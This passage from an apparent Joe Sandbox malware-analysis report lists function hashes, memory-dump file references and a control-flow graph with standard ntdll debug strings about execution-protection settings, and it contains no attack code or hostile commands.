                                                          • Opcode ID: 7bb5d8dfad2479270c97f899287f7577de90c751b18ed95ba40ba9c496aeb3e9
                                                          • Instruction ID: 7c7e5b936e33ad97c7dd2043f6512595a1395ceb0d82d757e3dfce5acd62a497
                                                          • Opcode Fuzzy Hash: 7bb5d8dfad2479270c97f899287f7577de90c751b18ed95ba40ba9c496aeb3e9
                                                          • Instruction Fuzzy Hash: F5F0BE70B10308EBDB04DBA9E506AAEB3F8BF08304F404458E441EB382EF38E905CB50
                                                          Function 359F52E2 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abddb668b45ee69d708c6056525b7fdeb1d9fe2f9ef82b06f2cb7ccbfdb122e4
                                                          • Instruction ID: f50697e2027a0f22d1e8cc635dd217e393ebd38ac2aa08e6455bac63c25d5e78
                                                          • Opcode Fuzzy Hash: abddb668b45ee69d708c6056525b7fdeb1d9fe2f9ef82b06f2cb7ccbfdb122e4
                                                          • Instruction Fuzzy Hash: 44F0BE70A10348EBDB04DFB9E542EAEB3B8EF08304F404058A401EB281EAB8E905CB14
                                                          Function 359F54DB Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5972faba9fbc37a10354f5feb1cf68eae402145a2e2a836af4ac9a8bddb971b
                                                          • Instruction ID: 872bd64204898457f16f707b44a0ad93dc679739d8c99231fb493a43386f486b
                                                          • Opcode Fuzzy Hash: b5972faba9fbc37a10354f5feb1cf68eae402145a2e2a836af4ac9a8bddb971b
                                                          • Instruction Fuzzy Hash: 4AF08270A10348EBDB04DBA9D556E9E77B8AF08304F500058E501EB281EA74E905C714
                                                          Function 359F547F Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: acfa9a903ef2138a22988c1e9f6d5d579401b487a57dbed953ca1b7fd35866cb
                                                          • Instruction ID: bee850ef383be7636813f893fc325a5d577ca766a5c0853705fc653cfe6822cf
                                                          • Opcode Fuzzy Hash: acfa9a903ef2138a22988c1e9f6d5d579401b487a57dbed953ca1b7fd35866cb
                                                          • Instruction Fuzzy Hash: 46F08C70B11348EBDB04DBA9E556E9EB7B8AF08304F500058E601EB382EA78E905C758
                                                          Function 359DF72E Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7dedaa9c668f7698e014b2b94814e0ae3b908c0e219f01a5b356d097f900bd89
                                                          • Instruction ID: 048e0afb0ba26e068dbb8240acb0d4fbee623ce6b4903716a41e69c08d0953f9
                                                          • Opcode Fuzzy Hash: 7dedaa9c668f7698e014b2b94814e0ae3b908c0e219f01a5b356d097f900bd89
                                                          • Instruction Fuzzy Hash: 78F0EC70A00348EBDB04CBA9D56AE8EB7F8EF08704F040058E202EB281EA78E9058718
                                                          Function 359F51CB Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7ad43c84c8cac2d12199f2e2defbcbaafc3f996f1337d96422bc6e7aa5b71100
                                                          • Instruction ID: d92ab4c4d89a2beeff7e0e506a8e10d05a007b835f9796cf23ef4f10de972d42
                                                          • Opcode Fuzzy Hash: 7ad43c84c8cac2d12199f2e2defbcbaafc3f996f1337d96422bc6e7aa5b71100
                                                          • Instruction Fuzzy Hash: EEF082B0B1534CEBDB04DBA9D516E9EB7B8AF08308F440059E911EB2C1EA74E905C754
                                                          Function 3599D070 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                          • Instruction ID: 7f70e34d80b6a5f0a1c7227ed21b2deefb67b4be2af117ae27f18690257a9764
                                                          • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                          • Instruction Fuzzy Hash: 64F0AB3360421467C230AA0D8C01F9BFBACCBD5B30F24031AB9208B1E0CA74E901C7D6
                                                          Function 359F5341 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6596c2d9f40eaed8ff68764726347ae12c60f95e6ae7b8c6ab8d12e1d2c38401
                                                          • Instruction ID: 1f30065d1b607225c998bc67cc1da9b8816019128fbb34fea72408d5018c8f27
                                                          • Opcode Fuzzy Hash: 6596c2d9f40eaed8ff68764726347ae12c60f95e6ae7b8c6ab8d12e1d2c38401
                                                          • Instruction Fuzzy Hash: 26F0E270A04308EBCB04CBA9E446E9EB7B8EF09304F500058E411EB2D1EA74E9048714
                                                          Function 35957208 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7380c6dc114b08748cc61ffa05c64ef388872c7894410f2d1f9cd78b12d2fb01
                                                          • Instruction ID: 41f12319921d36c532974d0f3baf8289b4fafb4f9bb4f02a656efe9d1c4e21ed
                                                          • Opcode Fuzzy Hash: 7380c6dc114b08748cc61ffa05c64ef388872c7894410f2d1f9cd78b12d2fb01
                                                          • Instruction Fuzzy Hash: 43F0A0B9A19694DFE317C798C184F8277EDBB08BB0F058561D40D8B512C7A8DC80C292
                                                          Function 359F5227 Relevance: .0, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fc917d796cffd0f966c40ca0dc64d3610bb910ef7dd96acbfbbf3d553c92a5c
                                                          • Instruction ID: ab4519175036568e6255dc0c4577a4e78822af73fbdc9b3ed14b943015469706
                                                          • Opcode Fuzzy Hash: 7fc917d796cffd0f966c40ca0dc64d3610bb910ef7dd96acbfbbf3d553c92a5c
                                                          • Instruction Fuzzy Hash: AAF08270B14348EBDB04DBA9E556EAEB3B8AF08704F440058E901EB281EA75E905C754
                                                          Function 359555C0 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                          • Instruction ID: 79c08790c7c157ca4cef0b5725904aed98e1d3b0462c456b579e7aed8da14501
                                                          • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                          • Instruction Fuzzy Hash: D5E0ED33265714ABD2218B16D800F02BB69FF90BB0F208629E458175A18BA4F922CAD4
                                                          Function 359F37B6 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                          • Instruction ID: 60ee7758c345217b253ad8c0ac3a809334bb9f7b25afbd7188c5511375c89803
                                                          • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                          • Instruction Fuzzy Hash: 74E06DB2220200ABD754CB54CD01FA673ACFB04761F540258B516970E0DAB8BE40CB60
                                                          Function 359DB3D0 Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                          • Instruction ID: 223e2545bbbac2a83b0a262ceef8de9ea76412a31a15703eea6593dd9ddcb33c
                                                          • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                          • Instruction Fuzzy Hash: B4E0CD31385214B7D7225A40CC01F65B766DB407D0F108031FE085A650CA75BD51DAD4
                                                          Function 359A92BC Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83fac42b7a24869f8f90648a53729e787fef309ebf89f02fc0631ade7ee57f23
                                                          • Instruction ID: 003d163dfb06c5a918541f4f3147e99d174220fa85c9105f9cc79f10d64d0192
                                                          • Opcode Fuzzy Hash: 83fac42b7a24869f8f90648a53729e787fef309ebf89f02fc0631ade7ee57f23
                                                          • Instruction Fuzzy Hash: B0F03279251B80CBE21ACF08C1A1B1537BDFB49B00F800058C8468FBA1CB3AEA42CA40
                                                          Function 3591B562 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                          • Instruction ID: 63aca6baa7dcd5845b3551ef7afd5731f4e1a0e97936ed58e7dc42e6876092fe
                                                          • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                          • Instruction Fuzzy Hash: AAD05E32261660EFC7326F21EE05F827BB7AF84B11F450528B402264F186B5FE95C691
                                                          Function 359A930B Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                          • Instruction ID: 33bfded1965874e6fcaa64bd450c115900a37747603d0304b50205e58903121e
                                                          • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                          • Instruction Fuzzy Hash: 53D0177A945AC48FE317CB04C161B407BF8F705F80F850098E0424BAA2C77C9984CB10
                                                          Function 359F35B6 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                          • Instruction ID: 49a5022241d534537d70d4e1c46d213343029ef9896d5b9883185a3d708debaf
                                                          • Opcode Fuzzy Hash: fcfb85a4c58582e884ff618cf81e7b206b1561464208c9731accca16da9c68f1
                                                          • Instruction Fuzzy Hash: 81C012319960249BCF219A14C944A85B779BB443C0FA50090D00863560D638EE41CB90
                                                          Function 3594340D Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                          • Instruction ID: b99568b38ae9c17a793a42187fb00ae34eaa45a76af2eb5e0ebec8d1fff18701
                                                          • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                          • Instruction Fuzzy Hash: D5C080F41515406AE7078711C901F1C36547B087D5FD4115C6A41294A1C35C9C42C214
                                                          Function 35963090 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 64ae39bbf8d1a49d4815f250df90ad7e74f2c4aa380e9d0f35f6b2c7bd072de2
                                                          • Instruction ID: 1e570bc51aa30e21ab30bbc74413e3713f2203a5d3ef71d5469664a64d9efd22
                                                          • Opcode Fuzzy Hash: 64ae39bbf8d1a49d4815f250df90ad7e74f2c4aa380e9d0f35f6b2c7bd072de2
                                                          • Instruction Fuzzy Hash: 5690022224190802D14471588418707001A8BD0601F95C0A3A0024514DC61A8A6966B1
                                                          Function 35963010 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 555ffbaf66a1256c322c9819ba37b1e1e0aa3267885a1bae0c9a25706af89c44
                                                          • Instruction ID: d9a18f40d41362f5decf14c5eb9f674495f3f7f79acbb381c5dcd1dae632946f
                                                          • Opcode Fuzzy Hash: 555ffbaf66a1256c322c9819ba37b1e1e0aa3267885a1bae0c9a25706af89c44
                                                          • Instruction Fuzzy Hash: 50900222201D4442D14472584808B0F41194BE1202FD5C0ABA4156514CC91989595721
                                                          Function 35957630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 207 35957630-35957651 208 35957653-3595766f call 3592e660 207->208 209 3595768b-35957699 call 35964c30 207->209 214 35957675-35957682 208->214 215 35994638 208->215 216 35957684 214->216 217 3595769a-359576a9 call 35957818 214->217 219 3599463f-35994645 215->219 216->209 223 35957701-3595770a 217->223 224 359576ab-359576c1 call 359577cd 217->224 221 359576c7-359576d0 call 35957728 219->221 222 3599464b-359946b8 call 359af290 call 35969020 RtlDebugPrintTimes BaseQueryModuleData 219->222 221->223 235 359576d2 221->235 222->221 239 359946be-359946c6 222->239 227 359576d8-359576e1 223->227 224->219 224->221 232 359576e3-359576f2 call 3595771b 227->232 233 3595770c-3595770e 227->233 238 359576f4-359576f6 232->238 233->238 235->227 241 35957710-35957719 238->241 242 359576f8-359576fa 238->242 239->221 243 359946cc-359946d3 239->243 241->242 242->216 244 359576fc 242->244 243->221 245 359946d9-359946e4 243->245 246 359947be-359947d0 call 35962c50 244->246 247 359947b9 call 35964d48 245->247 248 359946ea-35994723 call 359af290 call 3596aaa0 245->248 246->216 247->246 256 3599473b-3599476b call 359af290 248->256 257 35994725-35994736 call 359af290 248->257 256->221 262 35994771-3599477f call 3596a770 256->262 257->223 265 35994781-35994783 262->265 266 35994786-359947a3 call 359af290 call 3599cf9e 262->266 265->266 266->221 271 359947a9-359947b2 266->271 271->262 272 359947b4 271->272 272->221
                                                          Strings
                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 35994655
                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 35994742
                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 359946FC
                                                          • ExecuteOptions, xrefs: 359946A0
                                                          • Execute=1, xrefs: 35994713
                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 35994787
                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 35994725
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                          • API String ID: 0-484625025
                                                          • Opcode ID: 8650418c3be3b16ee6fff1afab46b265e83c5e4c0547b2a57c3954186d638a01
                                                          • Instruction ID: 48a8dfb1c6745de05ad1ad1ea1301e04373ed950a41f178d5b0c2537fb45640e
                                                          • Opcode Fuzzy Hash: 8650418c3be3b16ee6fff1afab46b265e83c5e4c0547b2a57c3954186d638a01
                                                          • Instruction Fuzzy Hash: 5C514775600319AAEB11DBA4EC85FED73BCBF083A4F040899E505A7181EB71AB59CF61
                                                          Function 3593D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
